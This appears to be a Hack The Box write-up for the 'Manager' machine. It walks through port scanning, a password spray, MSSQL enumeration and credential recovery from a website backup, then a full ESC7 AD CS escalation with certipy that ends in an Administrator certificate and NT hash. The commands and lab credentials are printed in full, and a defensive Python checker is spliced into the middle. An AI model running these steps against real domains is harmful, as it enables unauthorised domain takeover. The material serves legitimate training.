Manager is a medium difficulty Windows machine which hosts an Active Directory environment with AD CS (Active Directory Certificate Services), a web server, and an SQL server. The foothold involves enumerating users using RID cycling and performing a password spray attack to gain access to the MSSQL service. The xp_dirtree procedure is then used to explore the filesystem, uncovering a website backup in the web-root. Extracting the backup reveals credentials that are reused to WinRM to the server. Finally, the attacker escalates privileges through AD CS via ESC7 exploitation.
Enumeration
Nmap Scan
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-ports-scan
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman
49693/tcp open unknown
49782/tcp open unknown
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ nmap -p53,80,88,135,139,389,445,1433,5985 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-03 01:37:39Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T19:35:12
|_Not valid after: 2054-11-01T19:35:12
|_ssl-date: 2024-11-03T01:38:28+00:00; +7h00m01s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager]
└──╼ $ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
Summary
* Open ports: 53,80,88,135,139,389,445,1433,5985
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - Kerberos - RPC - SMB - MSSQL - WinRM
* Important notes: Domain: manager.htb - DNS:dc01.manager.htb
Since I don't have any password yet, I will try each username as its own password, and I get a hit.
I can brute-force the MSSQL login too.
With valid credentials, I will look at the accessible shares and the MSSQL database. The shares didn't contain anything interesting, so I will move on to MSSQL.
And I'm in the database :))
When I deal with MSSQL, I go through a checklist of possible attack paths, so I will write one out:
Check for admin Access
Check the databases for juicy info and secrets
Check the possibility of capturing the MSSQL service account hash
Check for impersonating other users
Check for TRUSTWORTHY databases
Check for Linked Server
Check for Read or Write Access to the file system
Check for executing commands with xp_cmdshell
With this list in hand, I can move forward using the built-in commands of mssqlclient.py.
SQL> SELECT IS_SRVROLEMEMBER('sysadmin')
-----------
0
SQL (MANAGER\Operator guest@master)> enum_db
name is_trustworthy_on
------ -----------------
master 0
tempdb 0
model 0
msdb 1
SQL (MANAGER\Operator guest@master)> enum_owner
Database Owner
-------- -----
master sa
tempdb sa
model sa
msdb sa
SQL (MANAGER\Operator guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
--------------- ---------------- ----------- --------------- ------------------ ------------ -------
DC01\SQLEXPRESS SQLNCLI SQL Server DC01\SQLEXPRESS NULL NULL NULL
SQL (MANAGER\Operator guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
Up to this point I haven't found a usable path, and when I tried to capture the hash of the service account, I only got the hash of the machine account, which is uncrackable.
The last thing left to try is checking for read or write access to the file system. I will use xp_dirtree to list the directories under a path.
Lateral Movement
With an IIS web server running on the box, I can try to read web.config or another important file under its directory, inetpub. There are several interesting files here: web.config and website-backup-27-07-23-old.zip.
When I tried to access web.config through the web server, it returned file not found,
but when I tried to access the .zip file, it was downloaded.
I created a new directory, moved the zip file into it, unzipped it and listed the contents. There is an odd .xml file.
When dealing with AD CS, I go straight to enumerating possible escalation (ESC) paths using certipy.
Then I will also use certipy to find vulnerable templates or permissions.
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
The user raven has Enroll and ManageCA rights, which means he can enroll new certificates and edit permissions on any template, so I can make it vulnerable to ESC4.
The built-in SubCA template is also enabled (as it is by default). This template is vulnerable to ESC1 but only permits Domain Admins and Enterprise Admins to enroll.
The template is present and enabled (Enabled: True). If the SubCA template is disabled, we should enable it.
Since we have ManageCA rights, we can assign ManageCertificates rights to any account.
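A defender-side check for the ESC7 condition above, written as an added example for this writeup (it is not certipy's code and not part of the original post): it parses a CA "Access Rights" block in the layout certipy prints and flags any principal outside the expected admin groups that holds ManageCa or ManageCertificates. The sample block is constructed to mirror manager-DC01-CA, and the TRUSTED_ADMIN_GROUPS set is an assumption about which groups should legitimately manage a CA.

```python
import re
from typing import Dict, List, Set

# Constructed sample in the layout certipy prints, mirroring the
# 'Access Rights' shown for manager-DC01-CA in this writeup.
SAMPLE_ACCESS_RIGHTS = """\
    Access Rights
      Enroll                        : MANAGER.HTB\\Operator
                                      MANAGER.HTB\\Authenticated Users
                                      MANAGER.HTB\\Raven
      ManageCertificates            : MANAGER.HTB\\Administrators
                                      MANAGER.HTB\\Domain Admins
                                      MANAGER.HTB\\Enterprise Admins
      ManageCa                      : MANAGER.HTB\\Administrators
                                      MANAGER.HTB\\Domain Admins
                                      MANAGER.HTB\\Enterprise Admins
                                      MANAGER.HTB\\Raven
"""
# Assumption: only these built-in groups should manage the CA; any other
# principal holding ManageCa or ManageCertificates is an ESC7 finding.
TRUSTED_ADMIN_GROUPS = {"Administrators", "Domain Admins", "Enterprise Admins"}
DANGEROUS_RIGHTS = ("ManageCa", "ManageCertificates")

# 'Right : DOMAIN\Name' opens a right; a bare 'DOMAIN\Name' line continues it.
RIGHT_LINE = re.compile(r"^\s*(Enroll|ManageCertificates|ManageCa)\s*:\s*(\S.*?)\s*$")
PRINCIPAL_LINE = re.compile(r"^\s+([^:\\\s][^:\\]*\\[^:]+?)\s*$")

def parse_access_rights(text: str) -> Dict[str, List[str]]:
    """Map each CA access right to the principals certipy lists under it."""
    rights: Dict[str, List[str]] = {}
    current = None
    for line in text.splitlines():
        m = RIGHT_LINE.match(line)
        if m:
            current = m.group(1)
            rights.setdefault(current, []).append(m.group(2))
        elif current and (p := PRINCIPAL_LINE.match(line)):
            rights[current].append(p.group(1))
    return rights

def find_esc7(rights: Dict[str, List[str]]) -> Dict[str, Set[str]]:
    """Return {principal: {rights}} for non-admin holders of CA management rights."""
    findings: Dict[str, Set[str]] = {}
    for right in DANGEROUS_RIGHTS:
        for principal in rights.get(right, []):
            if principal.split("\\", 1)[-1] not in TRUSTED_ADMIN_GROUPS:
                findings.setdefault(principal, set()).add(right)
    return findings
```

Feeding the "Access Rights" section of real `certipy find -stdout` output into `find_esc7(parse_access_rights(...))` gives the same kind of finding certipy reports here, which is the condition to fix by removing the extra ManageCa grant.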
Exploitation Path
Enable SubCA template
Grant ManageCertificate rights
Request certificate for SubCA template impersonating administrator
Approve the enrollment request as raven
Access the machine as an administrator
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -enable-template 'SubCA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Grant ManageCertificate rights
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -add-officer raven
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
With the SubCA template enabled and ManageCertificates rights granted, we can request a certificate from the SubCA template while adding an alternative SAN.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 20
Would you like to save the private key? (y/N) y
[*] Saved private key to 20.key
[-] Failed to request certificate
We need to note the request ID (20) and answer yes to the question "Would you like to save the private key? (y/N)", as we will need this private key to retrieve the certificate later.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -issue-request 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy req -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -retrieve 20
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saved certificate and private key to 'administrator.pfx'
Now I can authenticate as the administrator with the .pfx file.
┌─[kali@parrot]─[~/HackTheBox/platform/machines/Manager/website-backup]
└──╼ $certipy auth -pfx administrator.pfx -domain manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef